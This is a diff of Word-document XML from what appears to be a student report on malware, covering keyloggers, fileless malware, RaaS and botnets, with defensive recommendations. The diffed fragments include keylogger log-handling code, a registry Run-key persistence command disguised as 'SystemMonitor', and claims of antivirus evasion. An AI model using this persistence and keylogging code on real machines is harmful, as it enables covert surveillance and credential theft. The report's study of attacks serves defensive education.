         <w:t>json</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>)</w:t>
       </w:r>
@@ -3804,34 +3803,44 @@
       <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>decrypted_text</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve"> = decrypt(data['keystroke'</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>])  #</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t xml:space="preserve"> AES decryption</w:t>
       </w:r>
@@ -3840,28 +3849,54 @@
       <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>with open("logs.txt", "a") as f:</w:t>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">with </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>open(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"logs.txt", "a") as f:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>f.write</w:t>
       </w:r>
@@ -3869,21 +3904,27 @@
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>(f"{data['timestamp']} - {</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>decrypted_text</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>}\n")</w:t>
       </w:r>
@@ -3921,13 +3962,18 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemMonitor /t REG_SZ /d "C:\Users\&lt;user&gt;\AppData\Roaming\system_monitor.exe"</w:t>
       </w:r>
     </w:p>
@@ -3971,7 +4017,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>The keylogger performed as expected, capturing and transmitting keystrokes with precise timestamps. The use of AES encryption ensured that even intercepted network traffic did not reveal cleartext inputs. The Flask server received and stored logs in near real time. No antivirus alerts were triggered during testing, particularly when the executable was obfuscated using PyInstaller with hidden window mode.</w:t>
       </w:r>
     </w:p>
@@ -4028,7 +4073,19 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t>Both malware implementations—fileless malware and the C2-enabled keylogger—revealed how effective even basic tools can be when combined with stealth, obfuscation, and legitimate system processes. The keylogger emphasized data exfiltration and persistence, while the fileless malware focused on in-memory execution and undetectability. In both cases, the use of free, widely available tools showed that advanced attacks are not limited to state-sponsored actors but are well within reach of low-to-mid skill adversaries.</w:t>
+        <w:t>Both malware implementations—fileless malware and the C2-enabled keylogger—revealed how effective even basic tools can be when combined with stealth, obfuscation, and legitimate system processes. The keylogger emphasi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ed data exfiltration and persistence, while the fileless malware focused on in-memory execution and undetectability. In both cases, the use of free, widely available tools showed that advanced attacks are not limited to state-sponsored actors but are well within reach of low-to-mid skill adversaries.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4180,7 +4237,14 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t>Fileless malware is engineered for stealth. By running entirely in memory and avoiding any interaction with disk storage, it evades traditional antivirus software and file-based scanning tools. As shown in the experiment, a PowerShell payload can be executed with a single obfuscated command, triggering a reverse shell without leaving a file behind. According to Sun et al. (2023), less than 12% of these attacks are detected during execution, highlighting their invisibility. However, setup requires moderate scripting knowledge and is often limited to systems with PowerShell or WMI access.</w:t>
+        <w:t xml:space="preserve">Fileless malware is engineered for stealth. By running entirely in memory and avoiding any interaction with disk storage, it evades traditional antivirus software and file-based scanning tools. As shown in the experiment, a PowerShell payload can be executed with a single </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>obfuscated command, triggering a reverse shell without leaving a file behind. According to Sun et al. (2023), less than 12% of these attacks are detected during execution, highlighting their invisibility. However, setup requires moderate scripting knowledge and is often limited to systems with PowerShell or WMI access.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4195,7 +4259,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Strengths:</w:t>
       </w:r>
       <w:r>
@@ -4351,7 +4414,19 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t>RaaS demonstrates the professionalization of malware. Developers create powerful ransomware payloads and distribute them to affiliates for a share of the ransom. Ahmed et al. (2023) describe this model as “cybercrime franchising,” offering user dashboards, encryption tools, and technical support. Payloads are modular and often include obfuscation, anti-debugging, and hybrid encryption schemes. While damaging, these attacks are very visible, drawing attention from law enforcement and threat intelligence groups.</w:t>
+        <w:t>RaaS demonstrates the professionali</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ation of malware. Developers create powerful ransomware payloads and distribute them to affiliates for a share of the ransom. Ahmed et al. (2023) describe this model as “cybercrime franchising,” offering user dashboards, encryption tools, and technical support. Payloads are modular and often include obfuscation, anti-debugging, and hybrid encryption schemes. While damaging, these attacks are very visible, drawing attention from law enforcement and threat intelligence groups.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4493,7 +4568,26 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t>Keyloggers are often underestimated, yet they form the foundation of many advanced attacks. When combined with C2 capabilities and persistence, as shown in the implementation, they can silently record and transmit everything a user types. Mourya et al. (2024) emphasize how modern keyloggers now include encryption and stealth features. They are easy to build, require few dependencies, and are rarely flagged by antivirus tools unless paired with known malicious behavior.</w:t>
+        <w:t xml:space="preserve">Keyloggers are often underestimated, yet they form the foundation of many advanced attacks. When combined with C2 capabilities and persistence, as shown in the implementation, they can </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>silently record and transmit everything a user types. Mourya et al. (2024) emphasi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>e how modern keyloggers now include encryption and stealth features. They are easy to build, require few dependencies, and are rarely flagged by antivirus tools unless paired with known malicious behavior.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4508,14 +4602,25 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Strengths:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Lightweight, effective, and highly customizable</w:t>
+        <w:t xml:space="preserve"> Lightweight, effective, and highly customi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>able</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5897,6 +6002,7 @@
           <w:sz w:val="34"/>
           <w:szCs w:val="34"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>5. Evaluation &amp; Recommendations</w:t>
       </w:r>
       <w:bookmarkEnd w:id="11"/>
@@ -5911,14 +6017,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve">Evaluating these five malware developments reveals how different strategies cater to different attack goals. Some are built for stealth, others for maximum damage, and some for scalability. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>By comparing both the academic findings and live implementations, clearer patterns emerge about which malware techniques are most dangerous and why.</w:t>
+        <w:t>Evaluating these five malware developments reveals how different strategies cater to different attack goals. Some are built for stealth, others for maximum damage, and some for scalability. By comparing both the academic findings and live implementations, clearer patterns emerge about which malware techniques are most dangerous and why.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5935,7 +6034,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Evaluation of Fileless Malware</w:t>
+        <w:t>Fileless Malware</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5965,7 +6064,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Evaluation of Phishing Credential Stealers</w:t>
+        <w:t>Phishing Credential Stealers</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5995,20 +6094,44 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Evaluation of Ransomware-as-a-Service</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>RaaS represents a shift in cybercrime—from isolated malware developers to organized services that anyone can use. Its structure is robust, with affiliate programs, dashboards, and customizable payloads. However, its high visibility and legal implications make it difficult to replicate ethically in lab environments. Despite this, the academic evidence shows that RaaS has caused more financial damage than any other category in this report. Detection strategies focus more on infrastructure disruption than stopping the payload itself, since encryption is usually irreversible once deployed.</w:t>
+        <w:t>Ransomware-as-a-Service</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>RaaS represents a shift in cybercrime—from isolated malware developers to organi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ed services that anyone can use. Its structure is robust, with affiliate programs, dashboards, and customi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>able payloads. However, its high visibility and legal implications make it difficult to replicate ethically in lab environments. Despite this, the academic evidence shows that RaaS has caused more financial damage than any other category in this report. Detection strategies focus more on infrastructure disruption than stopping the payload itself, since encryption is usually irreversible once deployed.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6025,20 +6148,32 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Evaluation of Botnet Malware</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Botnets are powerful due to their versatility. Whether used for data theft, surveillance, or DDoS, they allow attackers to control infected machines over time. The lab simulation showed how easily a basic botnet could be built using Python scripts and containers. Real-world botnets like Mirai and Emotet are more advanced, often using encrypted traffic and peer-to-peer communication to avoid takedowns. The academic research emphasized that spotting botnets requires ongoing traffic monitoring, as static tools rarely detect them early.</w:t>
+        <w:t>Botnet Malware</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Botnets are powerful due to their versatility. Whether used for data theft, surveillance, or DDoS, they allow attackers to control infected machines over time. The lab simulation showed how easily a basic botnet could be built using Python scripts and containers. Real-world botnets like Mirai and Emotet are more advanced, often using encrypted traffic and peer-to-peer communication to avoid takedowns. The academic research emphasi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ed that spotting botnets requires ongoing traffic monitoring, as static tools rarely detect them early.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6055,19 +6190,20 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Evaluation of Keylogger Malware</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
+        <w:t>Keylogger Malware</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">The keylogger implementation proved that even a basic script could be transformed into an effective surveillance tool when paired with real-time exfiltration and persistence features. The experiment mirrored </w:t>
       </w:r>
       <w:r>
@@ -6080,59 +6216,51 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve"> described in research, particularly encrypted log transfer, registry-based startup, and silent execution. Keyloggers are not particularly damaging on their </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>own, but they serve as valuable tools for gathering credentials or monitoring systems silently over time.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t xml:space="preserve"> described in research, particularly encrypted log transfer, registry-based startup, and silent execution. Keyloggers are not particularly damaging on their own, but they serve as valuable tools for gathering credentials or monitoring systems silently over time.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>To counter these threats effectively, defenders must move away from signature-based tools and toward more dynamic, context-aware detection methods.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-      </w:pPr>
+        <w:t>1. Deploy</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Recommendations for Defense and Research</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>To counter these threats effectively, defenders must move away from signature-based tools and toward more dynamic, context-aware detection methods.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>ing</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>1. Deploy Behavior-Based Monitoring:</w:t>
+        <w:t xml:space="preserve"> Behavior-Based Monitoring:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6166,7 +6294,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>2. Focus on Email and Browser Security:</w:t>
+        <w:t>2. Focus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ing</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on Email and Browser Security:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6210,29 +6354,73 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>4. Simulate Attacks in Safe Environments:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>Organizations should regularly simulate phishing, keylogger, and botnet attacks in isolated labs to better understand how threats evolve. Tools like Docker, PyInstaller, and Metasploit allow safe experimentation and defensive tuning.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>4. Simulat</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>5. Educate Beyond the Basics:</w:t>
+        <w:t>ing</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Attacks in Safe Environments:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>Organi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ations should regularly simulate phishing, keylogger, and botnet attacks in isolated labs to better understand how threats evolve. Tools like Docker, PyInstaller, and Metasploit allow safe experimentation and defensive tuning.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>5. Educat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ing</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Beyond the Basics:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6291,6 +6479,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Among all five, </w:t>
       </w:r>
       <w:r>
@@ -6305,14 +6494,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve"> stands out as the most dangerous. It operates entirely in system memory, leaves no files behind, and leverages trusted system tools like PowerShell to carry out its actions. This makes it incredibly difficult to detect using standard security tools. The </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">literature showed consistent evidence of its stealth and growing use in advanced persistent threat (APT) campaigns. The experiment further confirmed this, where a fileless payload successfully opened a remote shell on the victim machine without triggering any alarms. These characteristics position fileless malware as a critical threat to modern </w:t>
